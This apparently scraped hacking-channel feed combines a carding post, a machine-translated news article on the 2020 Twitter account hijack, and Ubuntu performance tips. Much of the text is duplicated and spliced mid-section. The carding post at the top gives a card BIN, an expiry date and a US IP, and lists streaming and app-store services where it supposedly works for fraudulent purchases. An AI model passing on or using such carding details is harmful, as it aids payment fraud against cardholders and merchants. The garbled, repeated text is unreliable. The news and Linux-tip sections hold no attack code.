BIN: 431732027035xxxx
DATE: 02/23
CVV: RANDOM
IP: USA 🇺🇸
Working For :
Pubg Uc
Prime Video
PlayStore
Spotify (Paid & Auto Renew)
Netflix
Ding (Charged Card Needed)
Note: Lives CVV Needed.
- Working on more Sites.
(Only verified, not created by us)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑We all know what happen's to twitter but the real details :
#news
?Twitter mass hacking may evolve into a global security crisis
Sina Technology News, July 16th, Beijing time, according to foreign media reports, Bitcoin scammers will not be the last person to steal a certified account-we should be vigilant, because there will be other people to steal our account .
Everything is expected.
The hacker attack on July 15, 2020 is TwitterThe worst security breach in company history. No matter how the company ultimately tells the story, one thing must be acknowledged that the crisis has been brewing as early as a few years ago.
Since the spring of 2018, scammers have been posing as well-known cryptocurrency enthusiast Elon Musk. They use Musk's avatar, choose a similar username, and then post an effective invitation that looks like a pie in the sky: lend him some cryptocurrency and he will give you back more. Sometimes scammers will reply to a connected and authenticated account (such as Musk's SpaceX) to make the fake account look more real. Scammers also spread false tweets through botnets, also to increase authenticity.
The events of 2018 let us see three things. First, there are always people who are deceived, and every time someone is deceived, it is enough to inspire further fraud; second, Twitter's handling of this threat is slow, far less than the company's promise to take these issues seriously in the morning; Third, the needs of scammers and Twitter’s initial countermeasures formed a cat-and-mouse game, which in turn encouraged criminals to take more aggressive actions to create damage.
So there is today's largest attack. Nick Statt reports:
“Large companies and individuals’ Twitter accounts have recently encountered the largest hacker attack on the platform ever. All attacks are aimed at promoting bitcoin scams, and the initiators seem to have earned a small amount of money from them. We don’t know how the attack happened Yes, I don’t know how much damage to Twitter’s own system. The hackers seem to have stopped, but the authentication account has been posting new scam tweets from 4 pm Eastern time, which has lasted for more than two hours. It has been silent for more than one hour At last, Twitter finally admitted the time of the hacker attack. At 5:45 ET, it wrote on the company's user support account:'We have been informed of the security incidents affecting users of our platform. We are investigating and actively taking measures to respond to the attack. We We will provide you with the latest information as soon as possible.'"
Including former President Barack Obama, Joe Biden, AmazonCEOs Jeff Bezos, Bill Gates and pop singer Kanye West among others and AppleAnd UberThe authentication accounts of other technology companies were hacked.
But they are all later things. Who was the first celebrity account to be attacked? Elon Musk, no doubt.
In the first few hours of hacking, the deceived people sent more than 118,000 dollars to the hackers. In addition, hackers may also access a large number of personal direct messages. Even more disturbing is the speed and scale of hacker attacks, as well as deeper national security issues.
Of course, the most important and most obvious question is, who is the initiator of the attack and how did they do it? As of press time, we have no answer. According to a report by security reporter Joseph Cox, screenshots shared among members of the underground hacker community show that someone can access the tools used to manage accounts within Twitter. Cox wrote:
"Two sources of the underground hacker community provided a screenshot of an internal control panel to the media. It is alleged that Twitter employees use this internal control panel to manage user accounts. A source said that this control panel of Twitter is also used to Change the ownership of certain so-called OG accounts. Twitter has deleted screenshots of these control panels and suspended the user accounts that posted these screenshots, saying the content violates community rules."
🦑We all know what happen's to twitter but the real details :
#news
?Twitter mass hacking may evolve into a global security crisis
Sina Technology News, July 16th, Beijing time, according to foreign media reports, Bitcoin scammers will not be the last person to steal a certified account-we should be vigilant, because there will be other people to steal our account .
Everything is expected.
The hacker attack on July 15, 2020 is TwitterThe worst security breach in company history. No matter how the company ultimately tells the story, one thing must be acknowledged that the crisis has been brewing as early as a few years ago.
Since the spring of 2018, scammers have been posing as well-known cryptocurrency enthusiast Elon Musk. They use Musk's avatar, choose a similar username, and then post an effective invitation that looks like a pie in the sky: lend him some cryptocurrency and he will give you back more. Sometimes scammers will reply to a connected and authenticated account (such as Musk's SpaceX) to make the fake account look more real. Scammers also spread false tweets through botnets, also to increase authenticity.
The events of 2018 let us see three things. First, there are always people who are deceived, and every time someone is deceived, it is enough to inspire further fraud; second, Twitter's handling of this threat is slow, far less than the company's promise to take these issues seriously in the morning; Third, the needs of scammers and Twitter’s initial countermeasures formed a cat-and-mouse game, which in turn encouraged criminals to take more aggressive actions to create damage.
So there is today's largest attack. Nick Statt reports:
“Large companies and individuals’ Twitter accounts have recently encountered the largest hacker attack on the platform ever. All attacks are aimed at promoting bitcoin scams, and the initiators seem to have earned a small amount of money from them. We don’t know how the attack happened Yes, I don’t know how much damage to Twitter’s own system. The hackers seem to have stopped, but the authentication account has been posting new scam tweets from 4 pm Eastern time, which has lasted for more than two hours. It has been silent for more than one hour At last, Twitter finally admitted the time of the hacker attack. At 5:45 ET, it wrote on the company's user support account:'We have been informed of the security incidents affecting users of our platform. We are investigating and actively taking measures to respond to the attack. We We will provide you with the latest information as soon as possible.'"
Including former President Barack Obama, Joe Biden, AmazonCEOs Jeff Bezos, Bill Gates and pop singer Kanye West among others and AppleAnd UberThe authentication accounts of other technology companies were hacked.
But they are all later things. Who was the first celebrity account to be attacked? Elon Musk, no doubt.
In the first few hours of hacking, the deceived people sent more than 118,000 dollars to the hackers. In addition, hackers may also access a large number of personal direct messages. Even more disturbing is the speed and scale of hacker attacks, as well as deeper national security issues.
Of course, the most important and most obvious question is, who is the initiator of the attack and how did they do it? As of press time, we have no answer. According to a report by security reporter Joseph Cox, screenshots shared among members of the underground hacker community show that someone can access the tools used to manage accounts within Twitter. Cox wrote:
"Two sources of the underground hacker community provided a screenshot of an internal control panel to the media. It is alleged that Twitter employees use this internal control panel to manage user accounts. A source said that this control panel of Twitter is also used to Change the ownership of certain so-called OG accounts. Twitter has deleted screenshots of these control panels and suspended the user accounts that posted these screenshots, saying the content violates community rules."
Continuing speculation will inevitably appear irresponsible, but Cox’s report has at least stated that this is not a simple and ordinary hacking incident. One possibility is that a hacker broke Twitter’s internal tools; Cox also proposed another possibility. There are ghosts in Twitter employees who participated in this attack-if that is the case, then Twitter is really a lottery in the year. Twice.
In either case, Twitter’s response to this incident has caused further confusion. The company’s earliest tweet about this matter basically did not mention any substantive content. Two hours later, Twitter simply stated that the company has disabled the tweet function of the authenticated account, or has reset their password. Try to investigate the root cause of the attack. But just before Twitter explained the situation, many users were already forced to find that they couldn't tweet.
Politicians, celebrities, and national news media will not be able to tweet, but save Twitter some public relations trouble. Although ordinary users are ridiculous, but think about more serious problems. Twitter, whether good or bad, is always one of the most important communication systems in the world. Many of its users are related to emergency medical services. For example, the National Weather Service of Lincoln, Illinois just issued a tornado warning before the certification account was banned. Those who rely on this account to understand the follow-up of the tornado may be unlucky.
Of course, Twitter's ban on certified account statements is also a last resort. People probably prefer that the National Meteorological Service can't push, or want hackers to sell their accounts to criminals and then the latter took the opportunity to log in to the account to post some false information, such as falsely claiming that the tornado fee swept the major cities of the United States and so on. But using this clumsy method to solve the problem-prohibiting most of the 359,000 certified accounts from publishing messages-reflects the wide scope of the incident.
Then you can't help but wonder what emergency measures the company will take if it is not a greedy bitcoin scammer next time, but a national-level person or a mental patient. After this incident, it is not difficult to imagine that if someone controls the account of a world leader and then attempts to launch a nuclear war, it is possible.
At this point, what the Senator Josh Hawley of the Republic of Missouri mentioned in his letter to Twitter CEO Jack Dorsey is very resonant. Holly said:
"I am concerned that this incident is not just a series of planned and premeditated independent hacker attacks, but also a successful attack on Twitter's own security. As you know, your millions of users not only rely on your service for public release Tweets also use your direct messaging service to communicate with each other in private. Successful attacks on your system's servers will pose a threat to the privacy and data security of all users."
However, Holly did not say comprehensively. Here, not only user privacy and data security are threatened. More importantly, impostor and fraud on Twitter are very likely to cause turmoil in the real world. To this day, we have seen this assumption actually happen. With less than four months left before the 2020 election, God knows exactly what will happen.
In the next few days, Twitter may investigate the cause of the security incident. The company may not be able to give a completely satisfactory explanation. But the important thing is that Twitter shares with the public what it has learned about the incident in a timely manner-and what measures the company will take in the future to prevent such a thing from happening again. (noob)
@▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
In either case, Twitter’s response to this incident has caused further confusion. The company’s earliest tweet about this matter basically did not mention any substantive content. Two hours later, Twitter simply stated that the company has disabled the tweet function of the authenticated account, or has reset their password. Try to investigate the root cause of the attack. But just before Twitter explained the situation, many users were already forced to find that they couldn't tweet.
Politicians, celebrities, and national news media will not be able to tweet, but save Twitter some public relations trouble. Although ordinary users are ridiculous, but think about more serious problems. Twitter, whether good or bad, is always one of the most important communication systems in the world. Many of its users are related to emergency medical services. For example, the National Weather Service of Lincoln, Illinois just issued a tornado warning before the certification account was banned. Those who rely on this account to understand the follow-up of the tornado may be unlucky.
Of course, Twitter's ban on certified account statements is also a last resort. People probably prefer that the National Meteorological Service can't push, or want hackers to sell their accounts to criminals and then the latter took the opportunity to log in to the account to post some false information, such as falsely claiming that the tornado fee swept the major cities of the United States and so on. But using this clumsy method to solve the problem-prohibiting most of the 359,000 certified accounts from publishing messages-reflects the wide scope of the incident.
Then you can't help but wonder what emergency measures the company will take if it is not a greedy bitcoin scammer next time, but a national-level person or a mental patient. After this incident, it is not difficult to imagine that if someone controls the account of a world leader and then attempts to launch a nuclear war, it is possible.
At this point, what the Senator Josh Hawley of the Republic of Missouri mentioned in his letter to Twitter CEO Jack Dorsey is very resonant. Holly said:
"I am concerned that this incident is not just a series of planned and premeditated independent hacker attacks, but also a successful attack on Twitter's own security. As you know, your millions of users not only rely on your service for public release Tweets also use your direct messaging service to communicate with each other in private. Successful attacks on your system's servers will pose a threat to the privacy and data security of all users."
However, Holly did not say comprehensively. Here, not only user privacy and data security are threatened. More importantly, impostor and fraud on Twitter are very likely to cause turmoil in the real world. To this day, we have seen this assumption actually happen. With less than four months left before the 2020 election, God knows exactly what will happen.
In the next few days, Twitter may investigate the cause of the security incident. The company may not be able to give a completely satisfactory explanation. But the important thing is that Twitter shares with the public what it has learned about the incident in a timely manner-and what measures the company will take in the future to prevent such a thing from happening again. (noob)
@▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑SPEEDUP ANY LINUX -WIKI SOURCES :
1. Reduce the default grub load time:
The grub gives you 10 seconds to change between dual boot OS or to go in recovery etc. To me, it’s too much. It also means you will have to sit beside your computer and press the enter key to boot into Ubuntu as soon as possible. A little time taking, ain’t it? The first trick would be to change this boot time. If you are more comfortable with a GUI tool, read this article to change grub time and boot order with Grub Customizer.
For the rest of us, you can simply use the following command to open grub configuration:
sudo gedit /etc/default/grub &
And change GRUB_TIMEOUT=10 to GRUB_TIMEOUT=2. This will change the boot time to 2 seconds. Prefer not to put 0 here as you will lose the privilege to change between OS and recovery options. Once you have changed the grub configuration, update grub to make the change count:
sudo update-grub
2. Manage startup applications:
Over the time you tend to start installing applications. If you are a regular It’s FOSS reader, you might have installed many apps from App of the week series.
Some of these apps are started at each startup and of course resources will be busy in running these applications. Result: a slow computer for a significant time duration at each boot. Go in Unity Dash and look for Startup Applications:
start up application Ubuntu 13.10
In here, look at what applications are loaded at startup. Now think if there are any applications which you don’t require to be started up every time you boot in to Ubuntu. Feel free to remove them:
change start up applications Ubuntu 13.10
But what if you don’t want to remove the applications from startup? For example, if you installed one of the best indicator applets for Ubuntu, you will want them to be started automatically at each boot.
What you can do here is to delay some the start of some of the programs. This way you will free up the resource at boot time and your applications will be started automatically, after some time. In the previous picture click on Edit and change the run command with a sleep option.
For example, if you want to delay the running of Dropbox indicator for let’s say 20 seconds, you just need to add a command like this in the existing command:
sleep 10;
So, the command ‘dropbox start -i‘ changes to ‘sleep 20; drobox start -i‘. Which means that now Dropbox will start with a 20 seconds delay. You can change the start time of another start up applications in the similar fashion.
Edit start up applications to make Ubuntu 13.10 run faster
3. Install preload to speed up application load time:
Preload is a daemon that runs in the background and analyzes user behavior and frequently run applications. Open a terminal and use the following command to install preload:
sudo apt-get install preload
After installing it, restart your computer and forget about it. It will be working in the background. Read more about preload.
4. Choose the best mirror for software updates:
It’s good to verify that you are using the best mirror to update the software. Ubuntu software repository are mirrored across the globe and it is quite advisable to use the one which is nearest to you. This will result in a quicker system update as it reduces the time to get the packages from the server.
In Software & Updates->Ubuntu Software tab->Download From choose Other and thereafter click on Select Best Server:
Change mirrors to speed up Ubuntu 13.10
It will run a test and tell you which is the best mirror for you. Normally, the best mirror is already set but as I said, no harm in verifying it. Also, this may result in some delay in getting the updates if the nearest mirror where the repository is cached is not updated frequently. This is useful for people with a relatively slower internet connection. You can also these tips to speed up wifi speed in Ubuntu.
🦑SPEEDUP ANY LINUX -WIKI SOURCES :
1. Reduce the default grub load time:
The grub gives you 10 seconds to change between dual boot OS or to go in recovery etc. To me, it’s too much. It also means you will have to sit beside your computer and press the enter key to boot into Ubuntu as soon as possible. A little time taking, ain’t it? The first trick would be to change this boot time. If you are more comfortable with a GUI tool, read this article to change grub time and boot order with Grub Customizer.
For the rest of us, you can simply use the following command to open grub configuration:
sudo gedit /etc/default/grub &
And change GRUB_TIMEOUT=10 to GRUB_TIMEOUT=2. This will change the boot time to 2 seconds. Prefer not to put 0 here as you will lose the privilege to change between OS and recovery options. Once you have changed the grub configuration, update grub to make the change count:
sudo update-grub
2. Manage startup applications:
Over the time you tend to start installing applications. If you are a regular It’s FOSS reader, you might have installed many apps from App of the week series.
Some of these apps are started at each startup and of course resources will be busy in running these applications. Result: a slow computer for a significant time duration at each boot. Go in Unity Dash and look for Startup Applications:
start up application Ubuntu 13.10
In here, look at what applications are loaded at startup. Now think if there are any applications which you don’t require to be started up every time you boot in to Ubuntu. Feel free to remove them:
change start up applications Ubuntu 13.10
But what if you don’t want to remove the applications from startup? For example, if you installed one of the best indicator applets for Ubuntu, you will want them to be started automatically at each boot.
What you can do here is to delay some the start of some of the programs. This way you will free up the resource at boot time and your applications will be started automatically, after some time. In the previous picture click on Edit and change the run command with a sleep option.
For example, if you want to delay the running of Dropbox indicator for let’s say 20 seconds, you just need to add a command like this in the existing command:
sleep 10;
So, the command ‘dropbox start -i‘ changes to ‘sleep 20; drobox start -i‘. Which means that now Dropbox will start with a 20 seconds delay. You can change the start time of another start up applications in the similar fashion.
Edit start up applications to make Ubuntu 13.10 run faster
3. Install preload to speed up application load time:
Preload is a daemon that runs in the background and analyzes user behavior and frequently run applications. Open a terminal and use the following command to install preload:
sudo apt-get install preload
After installing it, restart your computer and forget about it. It will be working in the background. Read more about preload.
4. Choose the best mirror for software updates:
It’s good to verify that you are using the best mirror to update the software. Ubuntu software repository are mirrored across the globe and it is quite advisable to use the one which is nearest to you. This will result in a quicker system update as it reduces the time to get the packages from the server.
In Software & Updates->Ubuntu Software tab->Download From choose Other and thereafter click on Select Best Server:
Change mirrors to speed up Ubuntu 13.10
It will run a test and tell you which is the best mirror for you. Normally, the best mirror is already set but as I said, no harm in verifying it. Also, this may result in some delay in getting the updates if the nearest mirror where the repository is cached is not updated frequently. This is useful for people with a relatively slower internet connection. You can also these tips to speed up wifi speed in Ubuntu.
5. Use apt-fast instead of apt-get for a speedy update:
apt-fast is a shell script wrapper for “apt-get” that improves updated and package download speed by downloading packages from multiple connections simultaneously. If you frequently use terminal and apt-get to install and update the packages, you may want to give apt-fast a try. Install apt-fast via official PPA using the following commands:
sudo add-apt-repository ppa:apt-fast/stable
sudo apt-get update
sudo apt-get install apt-fast
6. Remove language related ign from apt-get update:
Have you ever noticed the output of sudo apt-get update? There are three kinds of lines in it, hit, ign and get. You can read their meaning here. If you look at IGN lines, you will find that most of them are related to language translation. If you use all the applications, packages in English, there is absolutely no need for a translation of package database from English to English.
If you suppress this language related updates from apt-get, it will slightly increase the apt-get update speed. To do that, open the following file:
sudo gedit /etc/apt/apt.conf.d/00aptitude
And add the following line at the end of this file:
Acquire::Languages "none";
speed up apt get update in Ubuntu
7. Reduce overheating:
Overheating is a common problem in computers these days. An overheated computer runs quite slow. It takes ages to open a program when your CPU fan is running like Usain Bolt. There are two tools which you can use to reduce overheating and thus get a better system performance in Ubuntu, TLP and CPUFREQ.
To install and use TLP, use the following commands in a terminal:
sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw
sudo tlp start
You don’t need to do anything after installing TLP. It works in the background.
To install CPUFREQ indicator use the following command:
sudo apt-get install indicator-cpufreq
Restart your computer and use the Powersave mode in it:
CPUFREQ Indicator Applet
8. Tweak LibreOffice to make it faster:
If you are a frequent user of office product, then you may want to tweak the default LibreOffice a bit to make it faster. You will be tweaking memory option here. Open LibreOffice and go to Tools->Options. In there, choose Memory from the left sidebar and enable Systray Quickstarter along with increasing memory allocation.
Improve Libre Office performance
You can read more about how to speed up LibreOffice in detail.
9. Use a lightweight desktop environment (if you can)
If you chose to install the default Unity of GNOME desktop environment, you may choose to opt for a lightweight desktop environment like Xfce or LXDE.
These desktop environments use less RAM and consume less CPU. They also come with their own set of lightweight applications that further helps in running Ubuntu faster. You can refer to this detailed guide to learn how to install Xfce on Ubuntu.
Of course, the desktop might not look as modern as Unity or GNOME. That’s a compromise you have to make.
10. Use lighter alternatives for different applications:
This is more of a suggestion and liking. Some of the default or popular applications are resource heavy and may not be suitable for a low-end computer. What you can do is to use some alternates to these applications. For example, use AppGrid instead of Ubuntu Software Center. Use Gdebi to install packages. Use AbiWord instead of LibreOffice Writer etc.
That concludes the collection of tips to make Ubuntu 18.04, 16.04 and other versions faster. I am sure these tips would provide overall a better system performance.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
apt-fast is a shell script wrapper for “apt-get” that improves updated and package download speed by downloading packages from multiple connections simultaneously. If you frequently use terminal and apt-get to install and update the packages, you may want to give apt-fast a try. Install apt-fast via official PPA using the following commands:
sudo add-apt-repository ppa:apt-fast/stable
sudo apt-get update
sudo apt-get install apt-fast
6. Remove language related ign from apt-get update:
Have you ever noticed the output of sudo apt-get update? There are three kinds of lines in it, hit, ign and get. You can read their meaning here. If you look at IGN lines, you will find that most of them are related to language translation. If you use all the applications, packages in English, there is absolutely no need for a translation of package database from English to English.
If you suppress this language related updates from apt-get, it will slightly increase the apt-get update speed. To do that, open the following file:
sudo gedit /etc/apt/apt.conf.d/00aptitude
And add the following line at the end of this file:
Acquire::Languages "none";
speed up apt get update in Ubuntu
7. Reduce overheating:
Overheating is a common problem in computers these days. An overheated computer runs quite slow. It takes ages to open a program when your CPU fan is running like Usain Bolt. There are two tools which you can use to reduce overheating and thus get a better system performance in Ubuntu, TLP and CPUFREQ.
To install and use TLP, use the following commands in a terminal:
sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw
sudo tlp start
You don’t need to do anything after installing TLP. It works in the background.
To install CPUFREQ indicator use the following command:
sudo apt-get install indicator-cpufreq
Restart your computer and use the Powersave mode in it:
CPUFREQ Indicator Applet
8. Tweak LibreOffice to make it faster:
If you are a frequent user of office product, then you may want to tweak the default LibreOffice a bit to make it faster. You will be tweaking memory option here. Open LibreOffice and go to Tools->Options. In there, choose Memory from the left sidebar and enable Systray Quickstarter along with increasing memory allocation.
Improve Libre Office performance
You can read more about how to speed up LibreOffice in detail.
9. Use a lightweight desktop environment (if you can)
If you chose to install the default Unity of GNOME desktop environment, you may choose to opt for a lightweight desktop environment like Xfce or LXDE.
These desktop environments use less RAM and consume less CPU. They also come with their own set of lightweight applications that further helps in running Ubuntu faster. You can refer to this detailed guide to learn how to install Xfce on Ubuntu.
Of course, the desktop might not look as modern as Unity or GNOME. That’s a compromise you have to make.
10. Use lighter alternatives for different applications:
This is more of a suggestion and liking. Some of the default or popular applications are resource heavy and may not be suitable for a low-end computer. What you can do is to use some alternates to these applications. For example, use AppGrid instead of Ubuntu Software Center. Use Gdebi to install packages. Use AbiWord instead of LibreOffice Writer etc.
That concludes the collection of tips to make Ubuntu 18.04, 16.04 and other versions faster. I am sure these tips would provide overall a better system performance.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁